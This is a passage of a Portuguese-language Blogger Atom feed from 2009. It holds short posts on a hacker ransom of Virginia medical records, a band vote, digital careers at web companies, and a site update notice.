type='text/html' href='http://hackeregamer.blogspot.com/2009/05/novo-windos-7-mais-seguro-que-o-vista.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/7160373323451787450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/7160373323451787450'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/novo-windos-7-mais-seguro-que-o-vista.html' title='NOVO WINDOS 7 MAIS SEGURO QUE O VISTA'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-2929569252882264317</id><published>2009-05-06T12:07:00.000-07:00</published><updated>2009-05-06T12:12:34.078-07:00</updated><title type='text'>INVASÃO DE HACKER</title><content type='html'>&lt;a href="http://2.bp.blogspot.com/_TFOiYBLX0ww/SgHg7XG5IoI/AAAAAAAAAgk/6vH2zMILPrg/s1600-h/hacker.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 250px; height: 170px;" src="http://2.bp.blogspot.com/_TFOiYBLX0ww/SgHg7XG5IoI/AAAAAAAAAgk/6vH2zMILPrg/s320/hacker.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5332790744203207298" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Notícias sobre piratas e seqüestros são normais nos meios de comunicação, mas não é sempre que você ouve falar de um pirata virtual que seqüestra dados sigilosos. Pois nos Estados Unidos, um grupo de hackers invadiu um site com registros médicos de moradores do Estado da Virgínia.&lt;br /&gt;&lt;br /&gt;A quantia exigida para o resgate das informações sigilosas é de US$ 10 milhões. Os piratas afirmam ter feito um backup criptografado de cerca de 8 milhões de registros médicos e apagado os originais.&lt;br /&gt;&lt;br /&gt;O sistema violado reúne dados de receitas médicas de parte da população de Virgínia e é usado para minimizar excessos no uso de medicamentos. Autoridades americanas descobriram a invasão no dia 30 de abril, desde então o FBI investiga o caso.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-2929569252882264317?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/2929569252882264317/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/invasao-de-hacker.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/2929569252882264317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/2929569252882264317'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/invasao-de-hacker.html' title='INVASÃO DE HACKER'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_TFOiYBLX0ww/SgHg7XG5IoI/AAAAAAAAAgk/6vH2zMILPrg/s72-c/hacker.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-8448485306131746419</id><published>2009-04-30T09:10:00.000-07:00</published><updated>2009-04-30T09:25:31.707-07:00</updated><title type='text'>BANDA SINUCA S/A</title><content type='html'>Banda Sinuca S/A de Brasilia, vai tocar no Luciano Hulk, quem gostar da banda pode voltar no link logo abaixo do video, Vocalista Paulinho, Rodrigo Figueiredo(Guitarra), Celso (Baixo e Back vocal), Thiago Rabelo (Baterista).&lt;br /&gt;&lt;br /&gt;Votem !!!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="320" height="265"&gt;&lt;param name="movie" value="http://www.youtube.com/v/x9ZFDquO-U8&amp;hl=pt-br&amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/x9ZFDquO-U8&amp;hl=pt-br&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="320" height="265"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;O link de Votações é: http://www.8p.com.br/olhaminhabandadepoprock/rodfig/perfil&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-8448485306131746419?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/8448485306131746419/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/04/banda-sinuca-sa.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/8448485306131746419'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/8448485306131746419'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/04/banda-sinuca-sa.html' title='BANDA SINUCA S/A'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-5573981178905276585</id><published>2009-04-27T11:00:00.000-07:00</published><updated>2009-04-27T11:02:30.137-07:00</updated><title type='text'>CARREIRAS DIGITAIS</title><content type='html'>&lt;p&gt;&lt;object height="225" width="320"&gt;&lt;param name="movie" value="http://www.olhardigital.com.br/flashes/player_embed_low?path_video=http://p.download.uol.com.br/olhardigital/PGM125/pgm125_cv_carreiras_digitais.flv&amp;amp;player_width=640&amp;amp;player_height=380&amp;amp;tipo_player=baixa&amp;amp;titulo_video=Carreiras digitais&amp;amp;current_url=http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=3812?id_conteudo=3812"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.olhardigital.com.br/flashes/player_embed_low?path_video=http://p.download.uol.com.br/olhardigital/PGM125/pgm125_cv_carreiras_digitais.flv&amp;player_width=640&amp;player_height=380&amp;tipo_player=baixa&amp;titulo_video=Carreiras digitais&amp;current_url=http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=3812?id_conteudo=3812" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="320" height="225"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;Google, MSN, Yahoo! esses são apenas alguns dos nomes associados à nova economia nascida com a Internet. Mais que empresas, essas siglas se tornaram sinônimo de negócios bilionários. Na reportagem, você confere quais os critérios que elas adotam na hora de recrutar novos funcionários e conhece um pouco da rotina de trabalho pouco ortodoxa implantada em seus escritórios&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-5573981178905276585?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/5573981178905276585/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/04/carreiras-digitais.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/5573981178905276585'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/5573981178905276585'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/04/carreiras-digitais.html' title='CARREIRAS DIGITAIS'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-2845808804998360975</id><published>2009-04-19T16:20:00.003-07:00</published><updated>2009-04-19T16:21:08.284-07:00</updated><title type='text'>NOVIDADE</title><content type='html'>EM BREVE O JUSTIÇA SUPREMA ESTARÁ ATUALIZANDO TAMBÉM A ÁREA DE HACKERS E GAMERS&lt;br /&gt;&lt;br /&gt;SAUDAÇÕES A TODOS&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-2845808804998360975?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/2845808804998360975/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/04/novidade.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/2845808804998360975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/2845808804998360975'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/04/novidade.html' title='NOVIDADE'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
